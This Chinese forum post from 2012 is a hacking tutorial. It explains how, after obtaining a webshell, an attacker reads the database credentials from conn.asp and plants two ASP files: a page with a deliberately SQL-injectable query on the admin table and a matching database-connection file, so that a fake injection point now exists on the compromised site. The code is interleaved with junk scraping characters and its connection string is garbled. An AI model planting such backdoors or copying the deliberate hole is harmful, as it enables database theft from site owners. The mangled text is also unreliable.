首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
* S! n* r0 \* q/ s/ j a5 vASP/Visual Basic代码- I8 b3 ^9 q% M- Q+ s6 K" O
<!--#include file="xx.asp"-->
7 I Q6 F" y* T; X$ e4 X<% 6 K: q, G1 U! w# F+ ~$ E4 P
set rs=server.createobject("ADODB.recordset") 6 G% \6 b% }( M. i/ T6 }6 A# v
id = request("id")
9 w' o& j& _; D# @( |strSQL = "select * from admin where id=" & id
) i# v9 n' x5 l6 E; n: ars.open strSQL,conn,1,3
, L- b3 k5 l! k( [4 o6 g% f, ^rs.close
& t7 X2 b6 x+ r%> 3 H3 j6 ^( ~# z* \
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存! C& b7 _. t: j
然后就要构造一个连接数据库的文件了,代码如下:5 H8 \/ q; ]; [. ^) a
ASP/Visual Basic代码; c6 P' z% U3 l1 i& `$ M4 A$ v
<% # G6 a7 j, [6 t
strSQLServerName = "000.000.000.000" '服务器名称或地址
. H% J1 v( {( D! O$ vstrSQLDBUserName = "sqlname" '数据库帐号
" ?/ ~3 ?! g* H) u3 \strSQLDBPassword = "sqlpass" '数据库密码 6 c2 {" G# G0 \) j' l1 w# x# S
strSQLDBName = "sqldataname" '数据库名称 0 |. K- |" L- f% Y6 f
Set conn = Server.CreateObject("ADODB.Connection") 8 L: b, h2 u$ M* y" F
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";" 5 S9 I5 r( P4 a
conn.open strCon
: }# J$ J0 z0 z; G% ]%> $ l& R. C9 S& q$ H# ?) e+ e( x
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功& s9 S9 [$ u; Q; e7 b
|
发表于 2012-9-13 17:53:08
收藏
支持
反对